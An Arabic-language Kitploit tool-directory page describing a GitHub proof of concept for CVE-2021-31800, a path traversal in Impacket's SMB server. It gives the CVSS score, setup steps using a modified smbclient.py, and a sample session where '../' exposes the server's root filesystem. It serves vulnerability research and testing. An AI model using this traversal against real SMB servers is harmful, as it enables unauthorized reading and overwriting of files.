Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-31800-Impacket-SMB-Server-Arbitrary-file-read-write — ثغرة اجتياز المسار في smbserver.py تسمح للمهاجم بقراءة/كتابة ملفات عشوائية على الخادم. | Kitploit
أدوات/GitHubGitHub/p0dalirius/cve-2021-31800-impacket-smb-server-arbitrary-file-read-write
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتسريب البياناتاختبار الاختراق
GitHubp0dalirius/cve-2021-31800-impacket-smb-server-arbitrary-file-read-write

CVE-2021-31800-Impacket-SMB-Server-Arbitrary-file-read-write

ثغرة اجتياز المسار في smbserver.py تسمح للمهاجم بقراءة/كتابة ملفات عشوائية على الخادم.

عرض المستودع
الموقع الإلكتروني
1112منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-31800 - قراءة/كتابة ملفات عشوائية في خادم SMB الخاص بـ Impacket

  • متجه CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
  • درجة CVSS: 9.9 (حرجة)

الوصف

تسمح ثغرة مسار اجتياز (Path Traversal) في smbserver.py للمهاجم بقراءة/كتابة ملفات عشوائية على الخادم.

شرح تفصيلي لهذه المشكلة: https://checkmarx.com/blog/cve-2021-31800-how-we-used-impacket-to-hack-itself/

الاستخدام

ابدأ بيئة الاستغلال بكتابة make داخل ./exploit_env/. بعد ذلك يمكنك استخدام نسخة معدّلة من smbclient.py للحصول على قراءة/كتابة عشوائية للملفات عبر ثغرة مسار اجتياز (Path Traversal).

يمكنك بعد ذلك استخدام ../ للتنقل في نظام الملفات وقراءة أو كتابة الملفات! إليك مثال:

root@kitploit:~
# smbclient.py 192.168.1.27
Impacket v0.9.23.dev1+20210422.174300.cb6d43a6 - Copyright 2020 SecureAuth Corporation

Type help for list of commands
# shares
IPC$
SYSVOL
# use SYSVOL
# ls 
-rw-rw-rw-         10  Sun Jan  8 23:59:59 2023 test.txt
# ls ../
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 sbin
drw-rw-rw-        360  Sun Jan  8 23:59:59 2023 dev
drw-rw-rw-          0  Sun Jan  8 23:59:59 2023 sys
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 media
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 srv
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 opt
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 tmp
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 var
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 lib
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 bin
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 root
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 usr
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 mnt
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 run
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 boot
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 etc
drw-rw-rw-          0  Sun Jan  8 23:59:59 2023 proc
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 lib64
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 home
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 share
-rw-rw-rw-          0  Sun Jan  8 23:59:59 2023 .dockerenv
-rw-rw-rw-        142  Sun Jan  8 23:59:59 2023 entrypoint.sh
#

العرض التوضيحي

للعروض التوضيحية، يمكنك تشغيل البيئة الهشّة بكتابة make داخل ./vulnerable_env/.

المراجع

  • https://checkmarx.com/blog/cve-2021-31800-how-we-used-impacket-to-hack-itself/
  • تعليق مثير للاهتمام: https://github.com/fortra/impacket/blob/fea485d2e4a53e9c26c02678237df1fc6621b5f4/impacket/smbserver.py#L16
تنزيل الأداة